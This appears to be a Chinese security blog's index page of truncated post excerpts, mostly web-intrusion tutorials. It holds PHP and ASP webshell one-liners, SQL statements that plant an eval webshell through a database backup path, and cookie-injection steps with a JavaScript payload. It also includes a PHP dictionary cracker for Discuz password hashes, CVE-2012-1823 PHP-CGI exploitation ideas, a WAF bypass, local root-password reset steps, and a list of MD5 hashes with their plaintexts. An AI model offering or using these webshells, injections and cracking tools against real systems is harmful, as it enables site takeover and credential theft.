AIDesign——Logo设计制作网站,支持多格式免费下载

AIDesign一款在线的logo设计制作网站,支持多格式免费下载。 是腾讯自研的智能设计平台,免费在线生成品牌logo、企业VI,仅需3步助您开启业务。 一、使用步骤 1、输入文字,点击下一步 2、选择行业分类 3、选择您喜欢的元素 4、效果图 5、支持多种格式的免费下载 二、官网地址 https://ailogo.qq.com

Linux系统各版本的本地root密码破解方法

这段时间老碰到有人问及各个linux版本的本地root密码破解方法,我这里自己以及在网络上搜集了些资料,希望对看到了这文章而又恰好用得到的技术人员有点帮助: (一)RedHat/CentOS/Fedora 系统密码破解   1.在grub选项菜单按E进入编辑模式   2.编辑kernel 那行最后加上S (或者Single)   3.按B,启动到single-user mode   4.进入后执行下列命令   # mount -t proc proc /proc   # mount -o remount,rw /   #passwd   #sync   #reboot (二)Debian linux 系统密码破解   1.在grub选项菜单’Debian GNU/Linux,̷...

Cookies注入步骤

Cookies注入步骤 1)寻找形如“*.asp?id=x”类的带参数的rul 2)去掉“id=x”查看页面显示是否正常。如果不正常,说明差数在数据传递中时直接起作用的 3)清空浏览器地址,输入“ javascript:alert(document.cookie=“id=”+escape("x")); ” 按Enter返回一个对话框,内容是“id=x”,然后用原来的url刷新页面,如果显示正常, 说明代码是用Request(“ID”)这种格式收集数据的,可以利用cookies进行注入 4)重复上面的步骤,将常规脚本注入判断语句戴入上面的URL:” javascript:javascript:alert(document.cookie=...

discuz后台密码加密hash破解

discuz 密码大家公认的蛋疼 该程序采用碰撞破解 加载字典(各种库中提取的)   <?php error_reporting(0); if ($argc&lt;2) { print_r(' ----------------------------------------------------------------+ Usage: php '.$argv[0].' hash Example: php '.$argv[0].' cd1a0b2de38cc1d7d796b1d2ba6a954f:dc2bce ----------------------------------------------------------------+ '); die; } $fd=fopen("1.txt","rb"); if(!$fd) { echo "[!] error:打开字典文件...

杰奇CMS漏洞

杰奇CMS ( Jieqi CMS) 是一套以小说系统为主的CMS,目前的最新版本是1.7,在小说类的站中使用率还是比较高的,这几天花了点时间看了一下他的代码,觉得挺有意思的,跟大家分享一下。 整个系统核心代码是zend加密的,dezend之后看了一下。先从最几率最大的select型注入看起,但是发现所有地方GET过去的参数,最后都会带入\lib\database\database.php中组合SQL语句,再带入到jieqimysqldatabase类(\lib\database\mysql\db.php)的query方法进行最后的执行。 仔细查看后发现不可利用,因为如果是数字型的变量,带入到database.php时会进...

CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ 粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。 另外关于RCE的PoC原文没有给出,不过说明的确可以远程执行代码。那么他是怎么做到的呢?我粗略想了想,可以利用的参数只有一个-d参数了,作用是给php定义一个ini的值。 那么利用它能做什么呢?我给出如下两个RCE的PoC方案: 1...

关于php后门的编写

0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子,其他的可以查看php手册编写   system() <?php system($_GET[‘input’]); ?> http://192.168.247.133:81/shell.php?input=dir   ““”执行命令 “执行命令等价于shell_exec()函数来执行命令。 <?php echo`$_GET[input]`; ?> http://192.168.247.133:81/shell.php?input=dir 再来个更短的 <?=@`$_GET[c]`?> http://192.168.247.133:81/shell.php?c=dir 注...

删除、恢复wscript.shell

由于担心有些网站有注入漏洞,在安装服务器的时候删除了FSO,stream,WSCRIPT.SHELL等组建。结果安装VMware的时候,提示wscript.shell找不到。   恢复wscript.shell   建议如果真的为了安全一定要删除这些!   下面给出卸载和删除的方法   卸载wscript.shell对象,在cmd下或直接运行: regsvr32 /u %windir%system32WSHom.Ocx   卸载FSO对象,在cmd下或直接运行: regsvr32.exe /u %windir%system32scrrun.dll   卸载stream对象,在cmd下或直接运行: regsvr32 /s /u “C:ProgramFilesCommonFilesSy...

利用后台SQL查询语句拿webshell

今天,朋友给了一个比较好玩的后台 有SQL查询功能 在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了   以下拿webshell步骤 第一句代码 create table cmd (a varchar(50)) 第二句代码 insert into cmd (a) values (‘<%evalrequest(“qing520”)%>’) 第三句代码 select * into [a] in ‘d:wwwrootwjqcadadmin163Databackupx.asp;x.xls’ ‘excel 4.0;’ ...

问题ewebeditor编辑器突破安全狗

 题目说到了问题和突破,问题的ewebeditor程序,这儿程序问题出来哪儿呢?         1.登陆的地方被删除了,也就是admin_login.asp这个页面被删除了。         2.是post提交好像有问题,不管点击那个提交post都会跳转到登陆页面,但是登陆页面又没有,如果直接访问那个页面,当然也可以访问。     当然上边说到的突破,所谓突破也就是说非常规的环境,非常规的手法去实现同一个目的。下面说一下这个非常规的环境。  &n...

个人收藏的部分收费MD5!

MD5 HASH 84c45962d887564f a66abb5684c45962d887564f08346e8d admin123456 8a1929f5878b794b fbbf0df68a1929f5878b794bbc290f8e 0523213511 fd51ac9e0f2262e4 8720e806fd51ac9e0f2262e47c4e7ddf 06605528808 353acf6cc57272db f58745da353acf6cc57272db3134df7a 123654913 b55ff55babafbacb 87a1c784b55ff55babafbacbb628f089 13081722883 c62400c060a48312 67c2ddd7c62400c060a483124a8a27de 13473601320 104e084da292f200 0aabef17104e084da292f2006cbd7d0e 15001088761 253750c9e9c99fe1 a361e4d6253750c9e9c99fe1e3cf8c8a 1597408...